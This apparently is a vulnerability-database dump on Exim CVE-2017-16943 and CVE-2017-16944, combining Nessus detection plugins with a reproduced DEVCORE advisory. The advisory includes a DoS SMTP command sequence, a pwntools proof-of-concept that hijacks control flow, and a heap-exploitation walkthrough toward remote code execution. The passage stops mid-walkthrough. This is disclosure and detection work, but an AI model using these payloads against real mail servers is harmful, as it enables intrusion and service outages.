audit(AUDIT_OS_NOT, \"Ubuntu 17.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.88-5ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.88-5ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.89-5ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"exim4-daemon-light\", pkgver:\"4.89-5ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim4-daemon-heavy / exim4-daemon-light\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-13T07:01:59", "bulletinFamily": "scanner", "description": "According to its banner and supported extensions, the remote installation of\nExim is affected by a code execution flaw. The implementation of the BDAT SMTP\nverb for sending large binary messages introduced in Exim 4.88 can incorrectly\nfree an in-use region of memory, leading to memory corruption and potentially\nallowing an attacker to execute code.", "modified": "2019-12-02T00:00:00", "id": "EXIM_BDAT_CHUNK_UAF.NASL", "href": "https://www.tenable.com/plugins/nessus/104815", "published": "2017-11-29T00:00:00", "title": "Exim < 4.89.1 Use-After-Free BDAT Remote Code Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104815);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2017-16943\");\n\n script_name(english:\"Exim < 4.89.1 Use-After-Free BDAT Remote Code Execution\");\n script_summary(english:\"Checks the SMTP banner and for CHUNKING support\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server is potentially affected by a remote code execution\nflaw.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner and supported extensions, the remote installation of\nExim is affected by a code execution flaw. The implementation of the BDAT SMTP\nverb for sending large binary messages introduced in Exim 4.88 can incorrectly\nfree an in-use region of memory, leading to memory corruption and potentially\nallowing an attacker to execute code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.exim.org/lurker/message/20171125.034842.d1d75cac.en.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Exim 4.89.1 or later, or Exim 4.90-RC3 or later. If you cannot\nupgrade, edit your Exim configuration and set 'chunking_advertise_hosts' to an\nempty value as a workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-16943\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:exim:exim\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nport = get_service(svc:\"smtp\", default:25, exit_on_fail:TRUE);\n\nbanner = get_smtp_banner(port:port, exit_on_fail:TRUE);\nif (!banner)\n audit(AUDIT_NO_BANNER, port);\n\nif (\"Exim\" >!< banner)\n audit(AUDIT_NOT_LISTEN, 'Exim', port);\n\nmatches = pregmatch(pattern:\"^220.*Exim ([0-9\\.]+)(_RC[0-9]+)?\", string:banner);\nif (isnull(matches))\n audit(AUDIT_SERVICE_VER_FAIL, 'Exim', port);\n\nversion = matches[1];\nrc = matches[2];\n\n# 4.88 is the first vulnerable version. All of 4.88 is vulnerable.\n# 4.89.1 is the first official patched version in 4.89 branch.\n# 4.90 is not yet released, but Debian is shipping its Release Candidates.\n# 4.90_RC3 is the first 4.90 RC with a patch.\n\n# Unless they've got a 4.90 release candidate, they need to upgrade to 4.89.1.\nfix = \"4.89.1\";\n\n# Between 4.90 and 4.88 inclusive. RCs are ignored.\nif (ver_compare(fix:\"4.90\", ver:version, strict:FALSE) <= 0 &&\n ver_compare(fix:\"4.88\", ver:version, strict:FALSE) >= 0)\n{\n # 4.90 is a special case, because a fix was added to a 4.90 release candidate.\n if (version == \"4.90\")\n {\n if (isnull(rc) || rc =~ \"RC([3-9]|[1-9][0-9])\")\n audit(AUDIT_INST_VER_NOT_VULN, \"Exim\", version + rc);\n else\n fix = \"4.90_RC3\";\n }\n else if (ver_compare(fix:\"4.89.1\", ver:version, strict:FALSE) >= 0)\n {\n audit(AUDIT_INST_VER_NOT_VULN, \"Exim\", version + rc);\n }\n}\nelse\n{\n audit(AUDIT_INST_VER_NOT_VULN, \"Exim\", version + rc);\n}\n\nsocket = smtp_open(port:port, exit_on_fail:TRUE);\n# Ask for the supported extensions.\nif (!get_kb_item(\"TEST_exim_bdat_chunk_uaf_do_not_open_socket\"))\n send(socket:socket, data:'EHLO ' + this_host_name() + '\\r\\n');\nlines = smtp_recv_line(socket:socket, code:250);\nsmtp_close(socket:socket);\n\n# If the first line isn't a 250, the server might not support EHLO\nif (lines !~ \"^250[- ]\")\n audit(AUDIT_RESP_BAD, port, \"an SMTP EHLO command\");\n\nif (!pgrep(pattern:\"^250[- ]CHUNKING\", string:lines))\n exit(0, \"The Exim server listening on port \" + port + \" does not support CHUNKING/BDAT.\");\n\nsecurity_report_v4(\n port:port,\n severity:SECURITY_HOLE,\n extra:\n '\\n Banner : ' + strip(banner) +\n '\\n Installed version : ' + version + rc +\n '\\n Fixed version : ' + fix +\n '\\n The CHUNKING / BDAT extension was found to be enabled.'\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T09:47:08", "bulletinFamily": "scanner", "description": "It was discovered that Exim incorrectly handled memory in the ESMTP\nCHUNKING extension. A remote attacker could use this issue to cause\nExim to crash, resulting in a denial of service, or possibly execute\narbitrary code. The default compiler options for affected releases\nshould reduce the vulnerability to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "UBUNTU_USN-3493-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104808", "published": "2017-11-28T00:00:00", "title": "Ubuntu 17.04 / 17.10 : exim4 vulnerability (USN-3493-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3493-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104808);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-16943\");\n script_xref(name:\"USN\", value:\"3493-1\");\n\n script_name(english:\"Ubuntu 17.04 / 17.10 : exim4 vulnerability (USN-3493-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Exim incorrectly handled memory in the ESMTP\nCHUNKING extension. A remote attacker could use this issue to cause\nExim to crash, resulting in a denial of service, or possibly execute\narbitrary code. The default compiler options for affected releases\nshould reduce the vulnerability to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3493-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected exim4-daemon-heavy and / or exim4-daemon-light\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 17.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.88-5ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.88-5ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.89-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"exim4-daemon-light\", pkgver:\"4.89-5ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim4-daemon-heavy / exim4-daemon-light\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T08:17:11", "bulletinFamily": "scanner", "description": "This update for exim fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2017-16943: Fix possible remote code execution\n (boo#1069857).", "modified": "2019-12-02T00:00:00", "id": "OPENSUSE-2017-1342.NASL", "href": "https://www.tenable.com/plugins/nessus/105232", "published": "2017-12-14T00:00:00", "title": "openSUSE Security Update : exim (openSUSE-2017-1342)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1342.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105232);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/01/26 17:32:51 $\");\n\n script_cve_id(\"CVE-2017-16943\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2017-1342)\");\n script_summary(english:\"Check for the openSUSE-2017-1342 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for exim fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2017-16943: Fix possible remote code execution\n (boo#1069857).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1069857\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debuginfo-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debugsource-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-debuginfo-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximstats-html-4.86.2-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-4.86.2-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debuginfo-4.86.2-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debugsource-4.86.2-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-4.86.2-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-debuginfo-4.86.2-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximstats-html-4.86.2-17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2019-11-20T17:03:05", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "## Original article is [here](https://devco.re/blog/2017/12/11/Exim-RCE-advisory-CVE-2017-16943-en/)\n\n# Incorrect BDAT data handling leads to DoS \n\n### Vulnerability Analysis\nWhen receiving data with BDAT command, SMTP server should not consider a single dot `\u2018.\u2019` in a line to be the end of message. However, we found exim does in receive_msg when parsing header. Like the following output:\n```\n220 devco.re ESMTP Exim 4.90devstart_213-7c6ec81-XX Mon, 27 Nov 2017 16:58:20 +0800\nEHLO test\n250-devco.re Hello root at test\n250-SIZE 52428800\n250-8BITMIME\n250-PIPELINING\n250-AUTH PLAIN LOGIN CRAM-MD5\n250-CHUNKING\n250-STARTTLS\n250-PRDR\n250 HELP\nMAIL FROM:<meh@some.domain>\n250 OK\nRCPT TO:<meh@some.domain>\n250 Accepted\nBDAT 10\n.\n250- 10 byte chunk, total 0\n250 OK id=1eJFGW-000CB0-1R\n```\nAs we mentioned before, exim uses function pointers to switch input source. This bug makes exim go into an incorrect state because the function pointer `receive_getc` is not reset. If the next command is also a BDAT, `receive_getc` and `lwr_receive_getc` become the same and an infinite loop occurs inside `bdat_getc`. Program crashes due to stack exhaustion.\n[smtp_in.c: 546 bdat_getc](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L546)\n```\n if (chunking_data_left > 0)\n return lwr_receive_getc(chunking_data_left--);\n```\nThis is not enough to pose a threat because exim runs a fork server. After a further analysis, we made exim go into an infinite loop without crashing, using the following commands.\n```\n# CVE-2017-16944 PoC by meh at DEVCORE\n\nEHLO localhost\nMAIL FROM:<meh@some.domain>\nRCPT TO:<meh@some.domain>\nBDAT 100\n.\nMAIL FROM:<meh@some.domain>\nRCPT TO:<meh@some.domain>\nBDAT 0 LAST\n```\nThis makes attackers able to launch a resource based DoS attack and then force the whole server down.\n\n## Impact\n\nMake mail server process crash or hang. Attackers may launch a resource based DoS attack and then force the whole server down.", "modified": "2019-11-12T23:47:13", "published": "2017-12-11T15:59:10", "id": "H1:296994", "href": "https://hackerone.com/reports/296994", "type": "hackerone", "title": "The Internet: Exim handles BDAT data incorrectly and leads to crash/hang", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-20T17:03:05", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "Original article is [here](https://devco.re/blog/2017/12/11/Exim-RCE-advisory-CVE-2017-16943-en/)\n\n# Use-after-free in receive_msg leads to RCE\n\n### Vulnerability Analysis\nTo explain this bug, we need to start with the memory management of exim. There is a series of functions starts with `store_` such as `store_get`, `store_release`, `store_reset`. These functions are used to manage dynamically allocated memory and improve performance. Its architecture is like the illustration below:\n\n\nInitially, exim allocates a big storeblock (default 0x2000) and then cut it into **stores** when `store_get` is called, using global pointers to record the size of unused memory and where to cut in next allocation. Once the `current_block` is insufficient, it allocates a new block and appends it to the end of the chain, which is a linked list, and then makes `current_block` point to it. Exim maintains three `store_pool`, that is, there are three chains like the illustration above and every global variables are actually arrays.\nThis vulnerability is in `receive_msg` where exim reads headers: \n[receive.c: 1817 receive_msg](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1817)\n```c\n if (ptr >= header_size - 4)\n {\n int oldsize = header_size;\n /* header_size += 256; */\n header_size *= 2;\n if (!store_extend(next->text, oldsize, header_size))\n {\n uschar *newtext = store_get(header_size);\n memcpy(newtext, next->text, ptr);\n store_release(next->text);\n next->text = newtext;\n }\n }\n```\nIt seems normal if the store functions are just like realloc, malloc and free. However, they are different and cannot be used in this way. When exim tries to **extend** store, the function `store_extend` checks whether the old store is the latest store allocated in `current_block`. It returns False immediately if the check is failed.\n[store.c: 276 store_extend](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/store.c#L276)\n```c\nif (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||\n inc > yield_length[store_pool] + rounded_oldsize - oldsize)\n return FALSE;\n```\nOnce `store_extend` fails, exim tries to get a new store and release the old one. After we look into `store_get` and store_release, we found that `store_get` returns a **store**, but `store_release` releases a **block** if the store is at the head of it. That is to say, if `next->text` points to the start the `current_block` and `store_get` cuts store inside it for `newtext`, then `store_release(next->text)` frees `next->text`, which is equal to `current_block`, and leaves `newtext` and `current_block` pointing to a freed memory area. Any further usage of these pointers leads to a use-after-free vulnerability. To trigger this bug, we need to make exim call `store_get` after `next->text` is allocated. This was impossible until BDAT command was introduced into exim. BDAT makes `store_get` reachable and finally leads to an RCE.\nExim uses [function pointers](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/globals.h#L136) to switch between different input sources, such as `receive_getc`, `receive_getbuf`. When receiving BDAT data, `receive_getc` is set to `bdat_getc` in order to check left chunking data size and to handle following command of BDAT. In `receive_msg`, exim also uses `receive_getc`. It loops to read data, and stores data into `next->text`, extends if insufficient.\n[receive.c: 1817 receive_msg](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1789)\n```c\nfor (;;)\n {\n int ch = (receive_getc)(GETC_BUFFER_UNLIMITED);\n \n /* If we hit EOF on a SMTP connection, it's an error, since incoming\n SMTP must have a correct \".\" terminator. */\n\n if (ch == EOF && smtp_input /* && !smtp_batched_input */)\n {\n smtp_reply = handle_lost_connection(US\" (header)\");\n smtp_yield = FALSE;\n goto TIDYUP; /* Skip to end of function */\n }\n```\nIn `bdat_getc`, once the SIZE is reached, it tries to read the next BDAT command and raises error message if the following command is incorrect. \n[smtp_in.c: 628 bdat_getc](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L628)\n```c\n case BDAT_CMD:\n {\n int n;\n\n if (sscanf(CS smtp_cmd_data, \"%u %n\", &chunking_datasize, &n) < 1)\n\t{\n\t(void) synprot_error(L_smtp_protocol_error, 501, NULL,\n\t US\"missing size for BDAT command\");\n\treturn ERR;\n\t}\n```\nIn exim, it usually calls `synprot_error` to raise error message, which also logs at the same time.\n[smtp_in.c: 628 bdat_getc](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L2984)\n```c\nstatic int\nsynprot_error(int type, int code, uschar *data, uschar *errmess)\n{\nint yield = -1;\n\nlog_write(type, LOG_MAIN, \"SMTP %s error in \\\"%s\\\" %s %s\",\n (type == L_smtp_syntax_error)? \"syntax\" : \"protocol\",\n string_printing(smtp_cmd_buffer), host_and_ident(TRUE), errmess);\n```\nThe log messages are printed by string_printing. This function ensures a string is printable. For this reason, it extends the string to transfer characters if any unprintable character exists, such as `'\\n'->'\\\\n'`. Therefore, it asks `store_get` for memory to store strings.\nThis store makes ` if (!store_extend(next->text, oldsize, header_size))` in `receive_msg` failed when next extension occurs and then triggers use-after-free.\n\n### Exploitation\nThe following is the Proof-of-Concept(PoC) python script of this vulnerability. This PoC controls the control flow of SMTP server and sets instruction pointer to `0xdeadbeef`. For fuzzing issue, we did change the runtime configuration of exim. As a result, this PoC works only when **dkim** is enabled. We use it as an example because the situation is less complicated. The version with default configuration is also exploitable, and we will discuss it at the end of this section.\n```python\n# CVE-2017-16943 PoC by meh at DEVCORE\n# pip install pwntools\nfrom pwn import *\n\nr = remote('127.0.0.1', 25)\n\nr.recvline()\nr.sendline(\"EHLO test\")\nr.recvuntil(\"250 HELP\")\nr.sendline(\"MAIL FROM:<meh@some.domain>\")\nr.recvline()\nr.sendline(\"RCPT TO:<meh@some.domain>\")\nr.recvline()\nr.sendline('a'*0x1250+'\\x7f')\nr.recvuntil('command')\nr.sendline('BDAT 1')\nr.sendline(':BDAT \\x7f')\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\nr.send(s+ ':\\r\\n')\nr.recvuntil('command')\nr.send('\\n')\n\nr.interactive()\n```\n\n1. Running out of `current_block`\n In order to achieve code execution, we need to make the `next->text` get the first store of a block. That is, running out of `current_block` and making `store_get` allocate a new block. Therefore, we send a long message `'a'*0x1250+'\\x7f'` with an unprintable character to cut `current_block`, making `yield_length` less than 0x100.\n\n\n2. Starts BDAT data transfer\n After that, we send BDAT command to start data transfer. At the beginning, `next` and `next->text` are allocated by `store_get`. \n \n The function `dkim_exim_verify_init` is called sequentially and it also calls `store_get`. Notice that this function uses **ANOTHER `store_pool`**, so it allocates from heap without changing `current_block` which `next->text` also points to.\n[receive.c: 1734 receive_msg](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1734)\n ```c\n if (smtp_input && !smtp_batched_input && !dkim_disable_verify)\n dkim_exim_verify_init(chunking_state <= CHUNKING_OFFERED);\n ```\n\n3. Call `store_getc` inside `bdat_getc`\n Then, we send a BDAT command without SIZE. Exim complains about the incorrect command and cuts the `current_block` with `store_get` in `string_printing`. \n\n\n4. Keep sending msg until extension and bug triggered\n In this way, while we keep sending huge messages, `current_block` gets freed after the extension. In the malloc.c of glibc (so called ptmalloc), system manages a linked list of freed memory chunks, which is called unsortbin. Freed chunks are put into unsortbin if it is not the last chunk on the heap. In step 2, `dkim_exim_verify_init` allocated chunks after `next->text`. Therefore, this chunk is put into unsortbin and the pointers of linked list are stored into the first 16 bytes of chunk (on x86-64). The location written is exactly `current_block->next`, and therefore `current_block->next` is overwritten to `unsortbin` inside `main_arena` of libc (linked list pointer `fd` points back to `unsortbin` if no other freed chunk exists). \n\n\n5. Keep sending msg for the next extension\n When the next extension occurs, `store_get` tries to cut from `main_arena`, which makes attackers able to overwrite all global variables below main_arena. \n6. Overwrite global variables in libc\n7. Finish sending message and trigger `free()`\n In the PoC, we simply modified `__free_hook` and ended the line. Exim calls `store_reset` to reset the buffer and calls `__free_hook` in `free()`. At this stage, we successfully controlled instruction pointer `$rip`.\n However, this is not enough for an RCE because the arguments are uncontrollable. As a result, we improved this PoC to modify both `__free_hook` and `_IO_2_1_stdout_`. We forged the vtable of `stdout` and set `__free_hook` to any call of `fflush(stdout)` inside exim. When the program calls fflush, it sets the first argument to stdout and jumps to a function pointer on the vtable of stdout. Hence, we can control both `$rip` and the content of first argument. \n We consulted past CVE exploits and decided to call `expand_string`, which executes command with `execv` if we set the first argument to `${run{cmd}}`, and finally we got our RCE. \n \n\n\n#### Exploit for default configured exim\nWhen dkim is disabled, the PoC above fails because `current_block` is the last chunk on heap. This makes the system merge it into a big chunk called **top chunk** rather than unsortbin.\nThe illustrations below describe the difference of heap layout:\n\n\n\nTo avoid this, we need to make exim allocate and free some memories before we actually start our exploitation. Therefore, we add some steps between step 1 and step 2.\n\nAfter running out of `current_block`:\n1. Use DATA command to send lots of data\n Send huge data, make the chunk big and extend many times. After several extension, it calls 